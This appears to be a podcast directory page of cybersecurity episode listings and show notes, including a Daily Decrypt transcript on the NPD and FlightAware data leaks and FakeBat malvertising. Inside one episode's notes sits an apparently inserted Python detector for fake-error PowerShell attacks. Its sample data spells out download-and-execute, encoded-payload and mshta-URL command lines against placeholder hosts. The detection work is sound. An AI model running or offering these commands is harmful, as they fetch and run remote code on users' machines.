The Big Quote: "AI is only as good as the data that the model is trained on and, in the world of security, we happen to have probably the world's most high quality and quantitative data set in threat intelligence."

The CyberWire
Cyberattack cripples major American chipmaker.

The CyberWire

Play Episode Listen Later Aug 21, 2024 34:26


A major American chipmaker discloses a cyberattack. Cybercriminals exploit Progressive Web Applications (PWAs) to bypass iOS and Android defenses. Mandiant uncovers a privilege escalation vulnerability in Microsoft Azure Kubernetes Services. ALBeast hits ALB. Microsoft's latest security update has caused significant issues for dual-boot systems. The DOE's new SolarSnitch program aims to shore up solar panel security. Researchers uncover LLM poisoning techniques. An Iranian-linked group uses a fake podcast to lure a target. Our guest is Parya Lotfi, CEO of DuckDuckGoose, discussing the increasing problem of deepfakes in the cybersecurity landscape. Return to sender - AirTag edition.

Miss an episode? Sign up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn.

CyberWire Guest
Our guest Parya Lotfi, CEO of DuckDuckGoose, discusses the increasing relevance of deepfakes in the cybersecurity landscape.

Selected Reading
Microchip Technology discloses cyberattack impacting operations (Bleeping Computer)
Android and iOS users targeted with novel banking app phishing campaign (Cybernews)
Azure Kubernetes Services Vulnerability Exposed Sensitive Information (SecurityWeek)
ALBeast: Misconfiguration Flaw Exposes 15,000 AWS Load Balancers to Risk (HACKREAD)
Microsoft's latest security update has ruined dual-boot Windows and Linux PCs (The Verge)
DOE debuts SolarSnitch technology to boost cybersecurity in solar energy systems (Industrial Cyber)
Researchers Highlight How Poisoned LLMs Can Suggest Vulnerable Code (Dark Reading)
Best Laid Plans: TA453 Targets Religious Figure with Fake Podcast Invite Delivering New BlackSmith Malware Toolset (Proofpoint)
Serial mail thieves thwarted when victim sends herself an AirTag (Apple Insider)

The Daily Decrypt - Cyber News and Discussions
NPD and FlightAware Data Leaks Affect Billions – Cybersecurity News

The Daily Decrypt - Cyber News and Discussions

Play Episode Listen Later Aug 20, 2024


In today's episode, we explore the critical challenges to AI adoption revealed by CISOs, including data privacy concerns, insufficient staff skills, and misaligned organizational priorities, as highlighted in a new survey by Tines. We also discuss how security leaders can address these blockers by leveraging automation, strategic alignment, and continuous training. Additionally, we delve into the rise of malware such as FakeBat, recent data breaches affecting FlightAware and National Public Data, and necessary steps for individuals to secure their personal information.

Video Episode: https://youtu.be/HQt1nCHKgxI

00:00 - Intro
01:14 - NPD Hack Exposes Billions of Users' Data
04:01 - FlightAware Configuration Error Exposed User Data
07:35 - FakeBat Malware Targets Brave, Zoom, Notion Users
09:45 - Top AI Adoption Challenges and CISO Solutions

Articles referenced:
https://www.cybersecuritydive.com/spons/the-biggest-blockers-to-ai-adoption-according-to-cisos-and-how-to-remove/723672/
https://thehackernews.com/2024/08/cybercriminals-exploit-popular-software.html
https://www.bleepingcomputer.com/news/security/flightaware-configuration-error-leaked-user-data-for-years/
https://www.cbsnews.com/news/social-security-number-leak-npd-breach-what-to-know/

Sign up for digestible cyber news delivered to your inbox: https://news.thedailydecrypt.com

Thanks to Jered Jones for providing the music for this episode. https://www.jeredjones.com/
Logo Design by https://www.zackgraber.com/

Tags: Tines, Generative AI, Security, CISOs, FakeBat, malvertising, MSIX, Mandiant, FlightAware, Configuration, Cybersecurity, Data Leak, Data breach, Cybercriminals, Social Security, National Public Data

Transcript:

You probably heard about the data breach that allegedly compromised the personal information of nearly every American citizen, exposing social security numbers, addresses, and so much more to dark web cybercriminals. And so today we're going to talk about how this happened, what data was impacted, and what you can do to make sure you stay safe with your social security number on the dark web. Thousands of FlightAware users are now urged to reset their passwords after a configuration error exposed sensitive personal data for over three years. How did this FlightAware configuration error manage to leak user data for such an extended period of time? Cybercriminals are exploiting popular software searches to spread the FakeBat malware, using malvertising campaigns and Trojanized MSIX installers to infect unsuspecting users. And finally, a recent survey by Tines shows that 98% of large tech executives have halted their generative AI projects due to security risks. What strategic measures are CISOs employing to overcome the biggest blockers to AI implementation in their organization? You're listening to The Daily Decrypt.
Hackers have allegedly infiltrated a company known as National Public Data, or NPD, to steal unencrypted personal information of billions of people, including social security numbers, addresses, and family member names. This breach, attributed to the hacker group USDoD in April of 2024, puts almost everyone at risk of identity theft. If your data was a part of this breach, which it likely is, people can access it or bid on it on the dark web, so they could open new financial accounts or take out loans in your name. Luckily, this type of fraud is very preventable. All you have to do is contact the three major credit bureaus and place freezes on your accounts. And even before this breach, this is something that I would recommend to everybody. Unless they're in the process of buying a new home or opening up a new credit card, you don't need your credit accounts to be unfrozen. And this is something that I actually didn't do until about a year ago, during the AT&T breach, where my social security number was also leaked to the dark web. And I was very shocked to see how quickly it could be done. They all have web-based interfaces where you can go sign up for an account and click a button to place a freeze on your credit. It's also important to know that once your information is out there, it's out there forever. There's no company that can go and scrub your data from the dark web. If any company is selling you that service, it's not a real service. It's a scam. Or if you purchase the services of a specific company under the impression that they can do that, maybe they're not actually selling that, but maybe that's what you're thinking they're going to do. They're not going to be able to do that. What they are going to be able to do is coach you through the process of placing these credit freezes and help inform you about what that will actually prevent.
Alternatively, you can listen to this episode of The Daily Decrypt and continue listening for these tips for free. Placing these freezes on your credit essentially just prevents people or entities from running soft or hard credit checks against your credit, which is the barrier for most lines of credit, like new credit cards or home loans. And so by proxy, it prevents new home loans and new credit cards from being opened in your name, which is one of the biggest risks of having your social security number out there. Now, if an attacker is really motivated to get you personally, they can use that information to do all kinds of damage, primarily in information gathering about you to craft more effective phishing campaigns against you, which is the secondary risk of this type of data breach. So besides placing these credit checks, just be extra vigilant when you're looking at and clicking links through texts or emails, knowing that this information can help craft more effective phishing emails. Look at everything skeptically, and you should be good to go. Very similarly to that last story, there's an app called FlightAware, which is the world's largest flight tracking platform, that has just revealed a major security data incident. FlightAware discovered a configuration error dating back to January of 2021, which exposed user data for over three years. The data that it exposed can include your user ID, password, email address, and possibly even more sensitive information like your full name, billing and shipping address, social media accounts, phone number, and even social security number. The error was fixed by FlightAware on July 25th, 2024, so just a few weeks ago. But the breach's duration leaves significant room for potential misuse of your data, as we talked about in that last story. So if you have a FlightAware account, you'll need to reset your password immediately. If you log into the platform, it will prompt you to do so on your next login.
But what they're not going to tell you is that you also need to change the password to every account that uses the password to your FlightAware account. And that's because the username and password combo that was leaked in the FlightAware data breach will now be entered into every one of your accounts automatically. It's not a personal target. They're just going to try their luck and see if you maybe reuse that username and password combo. If that's ringing any bells for you, please go change your password to all of those accounts. And if it sounds too daunting to do that task manually, or you're not even sure what accounts share passwords, it's time to start using a password manager. I personally use 1Password, as do all of my friends, and I have almost a thousand accounts in there just for myself alone. Managing that amount of passwords is impossible, especially trying to maintain unique passwords across all of them. Nobody's memory can handle that. It will also create secure random passwords for you, so you don't have to use your creativity to come up with them or just change the characters that follow the password. Which, by the way, if you use a password even similar to the one that was leaked in your FlightAware breach, that too is considered compromised, because attackers will apply common manipulations to all passwords and just use those to try to log into your accounts as well. It's all automated. So, yeah, if you want more information about a password manager, check out 1Password. There's also a blog on our website at thedailydecrypt.com that will outline a simple three-step process to converting over to a password manager. It doesn't have to be as daunting as it may sound. FlightAware is also offering a free 24-month identity protection package through Equifax. So given these two stories back to back, whoever is listening is likely impacted. Go take advantage of that. That will actually monitor for any credit inquiries to Equifax.
In addition to you placing those freezes. Like, I highly don't... I highly recommend against simply monitoring, because by the time you get that alert, it's a little too late, right? Place the freeze, and then sign up for that free monitoring. And if you can't tell, passwords are getting breached every day. I don't like talking about data breaches on this platform. I don't like hearing about them, because they happen so frequently. I don't consider it cybersecurity news. The only reason this one made the cut is because it was so long-standing. This one has been going on for three years. But if you're hearing this and you still don't use a password manager and you don't change your passwords, the implications are pretty bad. Go do that. Reach out to us on Instagram or YouTube if you want any help or guidance along that process. It really is a lot simpler of a workflow as well. Like, it's a quality of life improvement and a security improvement. I promise you it's worth it. Cybercriminals are using popular Google searches to help them craft more effective info-stealing campaigns. So, what does this mean? They're letting Google tell them what people are searching for, specifically around business-related software. So for example, if you're going to Google and you're looking for a software that will help you manage personnel, or manage your tasks or store your documents, et cetera, you're going to go to Google and you say, what are the best softwares for this type of business task? Well, Google will happily give you the information, if you look for it, about what are the most common things to search for around this space, right? So hackers are taking that information and they're creating fake websites that will offer you services in line with what you're searching for. These websites might be carbon copies of actual services that you could find on the web that would satisfy your search, or they could be new services.
After they've created these imitation websites, they purchase Google ads to get those websites at the top of the search results, specifically for what you're searching for. Then within those websites, you're going to click a link that's going to download a malware called FakeBat. This malware will live in the installer for the software you're trying to find and download, such as Brave, like the browser; KeePass, which I'm assuming is a password manager; Notion, which is like a Confluence-style thing; Steam for games; and Zoom for business meetings online. It's important to know that even if you know the software you're searching for, like, ah, I'm looking for Notion, someone recommended it, you Google the word Notion, that first link, if it's an ad, can still be malicious. So not everyone is searching for, what's a business software I can use to hold all my documents? Some of them are just searching for, hey, where do I go to download Notion? That download link you click from Google, if it's a paid advertisement, could be malicious. And we always say it on this podcast: just don't click ads if you don't have to. That's one of the best ways you can avoid this type of thing. And finally, 98% of large tech executives have paused AI initiatives due to security risks. This was discovered by the automation company Tines during a recent survey and reveals the top barriers to AI adoption. 66% of CISOs worry about losing control over sensitive information. This can be anything from customer data, employee data, all the way down to proprietary code you're feeding into AI to have it help you fix. 60% of the CISOs report lacking AI expertise. 51% find friction between departments, from cross-functional teams, to align on AI priorities and risks. 49% face issues with outdated systems, so choose AI tools that integrate seamlessly with your existing tech stacks.
This survey by Tines can be very valuable, especially if you're someone who's trying to get your CISO to allow you to use AI. AI has a lot of potential for automating a lot of work and freeing up capacity for more impactful work. But if you have a good CISO, they're going to try to push back on the security risks. Check out the article linked in the show notes below for more information on how and what statistics you can use to help combat your CISO's fears and start using AI in your workplace. This has been The Daily Decrypt. If you found your key to unlocking the digital domain, show your support with a rating on Spotify or Apple Podcasts. It truly helps us stand at the frontier of cyber news. Don't forget to connect on Instagram or catch our episodes on YouTube. Until next time, keep your data safe and your curiosity alive.

Crying Out Cloud
Navigating Hyper Growth, AI Impact, and Mandiant Memories - Special Guest: Ryan Kazanciyan

Crying Out Cloud

Play Episode Listen Later Aug 5, 2024 37:30


Risky Business
Risky Business #757 – The ClownStrike cleanup continues

Risky Business

Play Episode Listen Later Jul 31, 2024 60:49


On this week's show, Patrick Gray and Adam Boileau discuss the week's security news, including:
The insurance industry's reaction to CrowdStrike's mess
Google's Workspace email validation flaw and its consequences for OAuth'd applications
Is the VMware ESX group membership feature a CVE or an FYI?
Secure Boot continues to under-deliver
North Korea's revenue neutral intelligence services
And much, much more

This episode is sponsored by allowlisting software vendor Airlock Digital. Airlock uses a kernel driver on Windows, so Chief Executive David Cottingham joined to discuss what the CrowdStrike kernel driver bug drama means for security vendors.

This episode is also available on YouTube. If you want to ruin the magic of radio and see the faces behind the show, well, now you can!

Show notes
Business interruption claims will drive insurance losses linked to CrowdStrike IT disruption | Cybersecurity Dive
Delta hires David Boies to seek damages from CrowdStrike, Microsoft
CrowdStrike disruption direct losses to reach $5.4B for Fortune 500, study finds | Cybersecurity Dive
Why CrowdStrike's Baffling BSOD Disaster Was Avoidable - YouTube
CrowdStrike offers a $10 apology gift card to say sorry for outage | TechCrunch
Crooks Bypassed Google's Email Verification to Create Workspace Accounts, Access 3rd-Party Services – Krebs on Security
Hackers exploit VMware vulnerability that gives them hypervisor admin | Ars Technica
Microsoft calls out apparent ESXi vulnerability that some researchers say is a 'nothing burger' | CyberScoop
AMI Platform Key leak undermines Secure Boot on 800+ PC models
Chrome will now prompt some users to send passwords for suspicious files | Ars Technica
Google Online Security Blog: Improving the security of Chrome cookies on Windows
A Senate Bill Would Radically Improve Voting Machine Security | WIRED
U.S. told Philippines it made 'missteps' in secret anti-vax propaganda effort | Reuters
Cyber firm KnowBe4 hired a fake IT worker from North Korea | CyberScoop
North Korean hacker used hospital ransomware attacks to fund espionage | CyberScoop
North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime's Military and Nuclear Programs
North Korean hacking group makes waves to gain Mandiant, FBI spotlight | CyberScoop
ServiceNow spots sales opportunities post-CrowdStrike outage | Cybersecurity Dive
Chaining Three Bugs to Access All Your ServiceNow Data
Cyber Supply Chain Risk Management Conference (CySCRM) 2024 | Conference | PNNL

Security Conversations
Ep6: After CrowdStrike chaos, should Microsoft kick EDR agents out of Windows kernel?

Security Conversations

Play Episode Listen Later Jul 26, 2024 76:37


Three Buddy Problem - Episode 6: As the dust settles on the CrowdStrike incident that blue-screened 8.5 million Windows computers worldwide, we dig into CrowdStrike's preliminary incident report, the lack of transparency in the update process and the need for more robust testing and validation. We also discuss Microsoft's responsibility to avoid infinite BSOD loops, risks of deploying EDR agents on critical systems, and how an EU settlement is being blamed for EDR vendors having access to the Windows kernel. Other topics on the show include Mandiant's attribution capabilities, North Korea's gov-backed hacking teams launching ransomware on hospitals, KnowBe4 hiring a fake North Korean IT worker, and new developments in the NSO Group surveillance-ware lawsuit. Hosts: Costin Raiu (Art of Noh), Juan Andres Guerrero-Saade (SentinelLabs), Ryan Naraine (SecurityWeek)

The Daily Scoop Podcast
APT45 designation highlights rising cyber threat; USAID reports over 1,300 missing devices

The Daily Scoop Podcast

Play Episode Listen Later Jul 25, 2024 5:10


A North Korean hacking group, newly designated as APT45 by the FBI and Mandiant, has broadened its ransomware operations to target healthcare providers, financial institutions, and energy companies. Previously known as Andariel or UNC614, the group has been active since at least 2009 and supports the interests of the North Korean government. Mandiant, a subsidiary of Google Cloud, emphasizes the group's rising sophistication and expanding target range, which now includes advanced technologies and critical infrastructure. The FBI is expected to release an advisory following Mandiant's report, detailing the group's tactics and historical focus on intelligence gathering from defense and research sectors. Additionally, the U.S. Agency for International Development (USAID) reports over 1,300 electronic devices, including iPhones, iPads, and computers, missing over the past three years. With two-thirds of its workforce based overseas, device security remains a critical challenge for the agency, reflecting a broader issue of mobile device management across federal agencies. Despite the losses, USAID remains committed to responsible stewardship of taxpayer dollars and rigorous digital asset security, particularly in challenging global environments. The Daily Scoop Podcast is available every Monday-Friday afternoon. If you want to hear more of the latest from Washington, subscribe to The Daily Scoop Podcast on Apple Podcasts, Soundcloud, Spotify and YouTube.

The CyberWire
The current state of Cyber Threat Intelligence.

The CyberWire

Play Episode Listen Later Jul 22, 2024 17:31


Rick Howard, The CSO, Chief Analyst, and Senior Fellow at N2K Cyber, discusses the current state of Cyber Threat Intelligence with CyberWire Hash Table guest John Hultquist, Mandiant's Chief Analyst. References: Andy Greenberg, 2022. Tracers in the Dark: The Global Hunt for the Crime Lords of Cryptocurrency [Book]. Goodreads. Josephine Wolff, October 2023. How Hackers Swindled Vegas [Explainer]. Slate. Rick Howard, 2023. Cybersecurity First Principles Book Appendix [Book Support Page]. N2K Cyberwire. Staff, September 2023. mWISE Conference 2023 [Conference Website]. Mandiant. Staff, n.d. VirusTotal Submissions Page [Landing Zone]. VirusTotal. Learn more about your ad choices. Visit megaphone.fm/adchoices

Cloud Security Podcast by Google
EP179 Teamwork Under Stress: Expedition Behavior in Cybersecurity Incident Response

Cloud Security Podcast by Google

Play Episode Listen Later Jul 1, 2024 23:28


Guests: Robin Shostack, Security Program Manager, Google; Jibran Ilyas, Managing Director Incident Response, Mandiant, Google Cloud
Topics: You talk about "teamwork under adverse conditions" to describe expedition behavior (EB). Could you tell us what it means? You have been involved in response to many high profile incidents; one of the ones we can talk about publicly is one of the biggest healthcare breaches at this time. Could you share how Expedition Behavior played a role in our response? Apart from during incident response, which is almost definitionally an adverse condition, how else can security teams apply this knowledge? If teams are going to embrace an expeditionary behavior mindset, how do they learn it? It's probably not feasible to ship every SOC team member off to the Okavango Delta for a NOLS course. Short of that, how do we foster EB in a new team? How do we create it in an existing team or an under-performing team?
Resources: EP174 How to Measure and Improve Your Cloud Incident Response Readiness: A New Framework; EP103 Security Incident Response and Public Cloud - Exploring with Mandiant; EP98 How to Cloud IR or Why Attackers Become Cloud Native Faster?; "Take a few of these: Cybersecurity lessons for 21st century healthcare professionals" blog; Getting More by Stuart Diamond (book); Who Moved My Cheese by Spencer Johnson (book)

ITSPmagazine | Technology. Cybersecurity. Society
From Air Force OSI Special Agent to Cybersecurity SVP: Wendi Whitmore's Leadership Journey | The Leadership Student Podcast with MK Palmore

ITSPmagazine | Technology. Cybersecurity. Society

Play Episode Listen Later Jun 28, 2024 33:45


Guest: Wendi Whitmore, Palo Alto Networks [@PaloAltoNtwks]
On Twitter | https://x.com/wendiwhitmore
On LinkedIn | https://www.linkedin.com/in/wendiwhitmore2/
Host: MK Palmore, Host of The Leadership Student Podcast
On ITSPmagazine | https://www.itspmagazine.com/itspmagazine-podcast-radio-hosts/mk-palmore

The Cybersecurity Defenders Podcast
#135 - Intel Chat: Sigma, Scattered Spider, Microsoft, Empire Market & UNC3886

The Cybersecurity Defenders Podcast

Play Episode Listen Later Jun 21, 2024 36:26


In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. SigmaHQ has introduced Sigma Correlations to enhance its rule-based detection capabilities, allowing for more sophisticated event correlation across multiple Sigma rules. Tyler Buchanan, a 22-year-old from the UK and alleged leader of the Scattered Spider hacking group, was arrested in Spain. Microsoft has issued an urgent update for all supported versions of Windows to address a critical Wi-Fi vulnerability, CVE-2024-30078. Three individuals, Yousef Selassie, Ugochukwu Emmanuel Nwosu, and David Gil, have been charged with operating Empire Market, a dark web marketplace that facilitated over $430 million in illegal transactions. In September 2022, Mandiant began investigating several intrusions conducted by UNC3886, a China-linked cyber espionage group, after discovering malware in ESXi hypervisors.

The Daily Decrypt - Cyber News and Discussions
Everything is Fake! Fake Error Messages, Fake Chrome Updates, and SnowFAKE (Snowflake)

The Daily Decrypt - Cyber News and Discussions

Play Episode Listen Later Jun 18, 2024


In today's episode, we delve into the recent surge of identity-based cyberattacks targeting Snowflake customers, with at least 100 companies confirmed impacted as disclosed by Mandiant and Pure Storage (https://www.cybersecuritydive.com/news/snowflake-customer-attacks-what-we-know/719056/). We also explore how attackers are leveraging social engineering to install malware through fake error messages, as outlined by Proofpoint researchers (https://www.helpnetsecurity.com/2024/06/17/social-engineering-malware-installation/). Finally, we discuss how legitimate websites are being exploited to deliver the BadSpace Windows backdoor, detailed by German cybersecurity company G DATA (https://www.gdatasoftware.com/blog/2024/06/37947-badspace-backdoor). 00:00 Introduction to Fake Cyber Attacks 01:11 Fake Error Messages 03:30 The Badspace Backdoor with Trae 06:54 Snowflake Breach: What Happened? Thanks to Jered Jones for providing the music for this episode. https://www.jeredjones.com/ Logo Design by https://www.zackgraber.com/

What we know about the Snowflake customer attacks
https://www.cybersecuritydive.com/news/snowflake-customer-attacks-what-we-know/719056/
Widespread Impact: Over 100 Snowflake customers have been confirmed impacted by identity-based attacks utilizing stolen credentials from infostealer malware. Approximately 165 businesses remain potentially exposed. [Source: Mandiant]
Key Entry Point: Attacks were not due to a vulnerability or breach within Snowflake's system but through stolen credentials from infostealer malware on non-Snowflake systems. Impacted accounts lacked multifactor authentication (MFA). [Source: Mandiant]
Early Detection: The earliest unauthorized access to Snowflake customer instances was detected on April 14, with Mandiant beginning its investigation on April 19 and identifying the first confirmed connection to Snowflake on May 14. [Source: Mandiant's June 10 Threat Intelligence Report]
Immediate Actions: Snowflake has been suspending user accounts showing signs of malicious activity, blocking suspicious IP addresses, and advising customers to enable MFA and configure network access policies. [Source: Snowflake CISO Brad Jones]
Data Theft: The first known sale of stolen data from a Snowflake customer database was posted on May 24. Snowflake disclosed the attacks on May 30, providing indicators of compromise and recommended actions for companies to investigate. [Source: Mandiant]
Ongoing Investigation: The investigation, assisted by Mandiant and CrowdStrike, is ongoing. The attacker, referred to as UNC5537, continues to extort victims with stolen data as of June 13. [Source: Mandiant]

Malware peddlers love this one social engineering trick!
https://www.helpnetsecurity.com/2024/06/17/social-engineering-malware-installation/
Key Information: Attackers increasingly use fake error messages to trick users into installing malware. Actionable Insight: Stay vigilant when encountering unexpected error messages prompting installations or updates.
Key Information: These fake error messages often accompany HTML documents delivered via email attachments. Actionable Insight: Exercise caution when opening email attachments, especially HTML documents, and verify the sender's authenticity.
Key Information: Users may be prompted to install root certificates, resolve issues, install extensions, or update DNS caches. Actionable Insight: Before following any such prompts, consult your IT department or perform a quick search to confirm the legitimacy of the request.
Key Information: The attack chain requires significant user interaction but cleverly disguises malware installation as a problem-solving step. Actionable Insight: Always take a moment to consider the risk before performing any suggested actions from an error message.
Key Information: Various attackers, including initial access brokers, use these techniques to deploy PowerShell scripts, installing malware like DarkGate and NetSupport. Actionable Insight: Familiarize yourself with the signs of PowerShell script execution and report any suspicious activity to your security team.
Key Information: Detection is difficult because the malicious script is copied to the clipboard via JavaScript and manually run by the user. Actionable Insight: Be wary of any browser prompts to copy scripts or commands and avoid running them directly from your clipboard.
Key Information: Users are the last line of defense if browsing protections and email filters fail. Actionable Insight: Engage in regular cybersecurity training to identify and report suspicious activities promptly.

Hackers Exploit Legitimate Websites to Deliver BadSpace Windows Backdoor
https://www.gdatasoftware.com/blog/2024/06/37947-badspace-backdoor
Compromised Websites as Conduits: Hackers use legitimate websites, often built on platforms like WordPress, to deliver a Windows backdoor named BadSpace. They disguise the attack as fake browser updates, making it hard for users to detect.
Multi-Stage Attack Chain: The attack begins with an infected website that checks if a user has visited before. On the first visit, the site collects device data, IP address, user-agent, and location, then sends it to a command-and-control (C2) server. The server responds with a fake Google Chrome update pop-up that either directly drops the malware or uses a JavaScript downloader to deploy BadSpace.
Malware Capabilities: BadSpace can harvest system information, take screenshots, execute commands, read/write files, and delete scheduled tasks. It employs anti-sandbox techniques and sets up persistence using scheduled tasks.
Connections to SocGholish: The C2 servers linked to BadSpace show connections to another malware known as SocGholish (aka FakeUpdates), which uses similar tactics.
Current Threat Landscape: Organizations like eSentire and Sucuri report ongoing campaigns using fake browser updates to spread information stealers and remote access trojans.
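The clipboard-to-PowerShell chain in the Proofpoint item above (a fake error page copies a one-liner with JavaScript, the user pastes it into the Run dialog or a terminal) leaves a recognisable process-creation footprint even though no file is ever downloaded by the browser. The following is an added example, not code from the podcast, Proofpoint or G DATA: it scores constructed Sysmon-style process events for that footprint and decodes -EncodedCommand payloads before matching, since the pasted command is often Base64. The field names, the parent-process sets, the weights and the sample command lines (with reserved .invalid hostnames) are all assumptions.

```python
"""Score process-creation events for the 'paste this to fix the error' pattern.

Added example (not the podcast's or Proofpoint's code). Events are dicts with
Sysmon-style Image / ParentImage / CommandLine fields; the sample below is
constructed and the hostnames are reserved .invalid names.
"""
import base64
import binascii
import re

# Hosts the pasted one-liner is typically executed by.
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Parents that mean a human launched it (the Run dialog lives in explorer.exe) rather than a task or service.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

HIDE_FLAGS = re.compile(r"-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|ep\s+bypass|executionpolicy\s+bypass)", re.I)
FETCH = re.compile(r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile|curl)\b", re.I)
EXEC = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
MSHTA_URL = re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="ignore")
    except (binascii.Error, ValueError):
        return None


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons). Higher means more like a pasted fake-fix command."""
    image, parent = _basename(ev["Image"]), _basename(ev["ParentImage"])
    if image not in LOLBINS:
        return 0, []
    score, reasons = 0, []
    text = ev["CommandLine"]
    if parent in INTERACTIVE_PARENTS:
        score += 2
        reasons.append(f"{image} spawned by interactive parent {parent}")
    decoded = decode_encoded_command(text)
    if decoded is not None:
        score += 2
        reasons.append("encoded command present; decoded text matched as well")
        text = text + " " + decoded  # match switches in the wrapper and cmdlets in the payload
    if HIDE_FLAGS.search(text):
        score += 1
        reasons.append("window hiding / profile or policy bypass switch")
    if FETCH.search(text) and EXEC.search(text):
        score += 3
        reasons.append("download-and-execute pattern")
    if MSHTA_URL.search(text):
        score += 3
        reasons.append("mshta pointed at a URL")
    return score, reasons


def detect(events, threshold=4):
    """Return (index, score, reasons) for every event at or above threshold."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((i, score, reasons))
    return hits


# Constructed sample. Event 1's payload is encoded here so the Base64 is genuine.
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://fixes.example.invalid/p.ps1')".encode("utf-16le")
).decode()
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Image": _PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iwr http://fixes.example.invalid/fix.ps1 | iex"'},
    {"Image": _PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    {"Image": _PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},  # scheduled task, benign
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "mshta.exe https://fixes.example.invalid/err.hta"},
    {"Image": _PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -c Get-Process"},  # a human at Win+R, nothing hostile
]

if __name__ == "__main__":
    for i, score, reasons in detect(SAMPLE_EVENTS):
        print(f"event {i}: score {score}: " + "; ".join(reasons))
```

Feed it real EDR or Sysmon exports by mapping their image, parent and command-line fields onto the three keys. The threshold of 4 is chosen so that an interactive parent on its own never fires: a user typing Get-Process into the Run dialog scores 2 and stays out of the queue, while the two things the pasted one-liner cannot avoid (a fetch plus an execute, or mshta given a URL) carry the weight.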

Cloud Security Podcast by Google
EP177 Cloud Incident Confessions: Top 5 Mistakes Leading to Breaches from Mandiant

Cloud Security Podcast by Google

Play Episode Listen Later Jun 17, 2024 30:07


Guests: Omar ElAhdan, Principal Consultant, Mandiant, Google Cloud; Will Silverstone, Senior Consultant, Mandiant, Google Cloud
Topics: Most organizations you see use both cloud and on-premise environments. What are the most common challenges organizations face in securing their hybrid cloud environments? You do IR, so in your experience, what are the top 5 mistakes organizations make that lead to cloud incidents? How and why do organizations get the attack surface wrong? Are there pillars of attack surface? We talk a lot about how IAM matters in the cloud. Is it true that AD is what gets you in many cases, even for other clouds? What is your best cloud incident preparedness advice for organizations that are new to cloud and still use on-prem as well?
Resources: Next 2024 LIVE Video of this episode / LinkedIn version (sorry for the audio quality!); "Lessons Learned from Cloud Compromise" podcast at The Defender's Advantage; "Cloud compromises: Lessons learned from Mandiant investigations" in 2023 from Next 2024; EP174 How to Measure and Improve Your Cloud Incident Response Readiness: A New Framework; EP103 Security Incident Response and Public Cloud - Exploring with Mandiant; EP162 IAM in the Cloud: What it Means to Do It 'Right' with Kat Traxler

The Cybersecurity Defenders Podcast
#133 - Intel Chat: Snowflake, Operation Endgame, Android spoof & Operation Crimson Palace

The Cybersecurity Defenders Podcast

Play Episode Listen Later Jun 13, 2024 25:37


In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. Mandiant has linked a series of data breaches affecting hundreds of Snowflake instances to the use of infostealer malware, primarily targeting non-Snowflake systems to harvest credentials. Authorities have ramped up something they are calling Operation Endgame, which includes an effort to capture an individual who goes by the handle "Odd," the alleged mastermind behind the Emotet botnet. McAfee has identified a fake Bahrain government Android app masquerading as the Labour Market Regulatory Authority app, designed to steal personal data for financial fraud. A technical deep-dive on Operation Crimson Palace performed by Sophos X-Ops: the operation exposes a sophisticated cyberespionage campaign targeting a Southeast Asian government, attributed to Chinese state interests.

The Daily Decrypt - Cyber News and Discussions
Sp1d3r Hacks Cylance, Google Busts Propaganda, NHS Hit by Russian Hackers

The Daily Decrypt - Cyber News and Discussions

Play Episode Listen Later Jun 12, 2024


In today's episode, we delve into the latest cybersecurity incidents, including Cylance confirming old data sold by Sp1d3r for $750,000, ongoing disruptions in the NHS due to a Russian Qilin ransomware attack, and Google's takedown of coordinated influence campaigns linked to China, Russia, and Indonesia. We also highlight Snowflake account breaches connected to recent data compromises at Advance Auto Parts, Santander, and Ticketmaster. Join us as we explore the implications of these attacks and the latest reports from BleepingComputer, The Guardian, and The Hacker News. References: https://www.bleepingcomputer.com/news/security/cylance-confirms-data-breach-linked-to-third-party-platform/ https://thehackernews.com/2024/06/google-takes-down-influence-campaigns.html https://www.theguardian.com/society/article/2024/jun/11/cyber-attack-on-london-hospitals-to-take-many-months-to-resolve Thanks to Jered Jones for providing the music for this episode. https://www.jeredjones.com/ Logo Design by https://www.zackgraber.com/

Cylance confirms data breach linked to 'third-party' platform
https://www.bleepingcomputer.com/news/security/cylance-confirms-data-breach-linked-to-third-party-platform/
Flash Briefing:
Data Breach Disclosure: Cylance confirmed that data being sold on a hacking forum is legitimate but old, stolen from a third-party platform. The data allegedly includes 34 million customer and employee emails and personally identifiable information. Source: BleepingComputer.
Threat Actor Activity: A hacker known as Sp1d3r is selling the stolen data for $750,000. Researchers indicated this data seems to be old marketing information. BlackBerry Cylance stated no current customers or sensitive data are impacted. Source: Dark Web Informer.
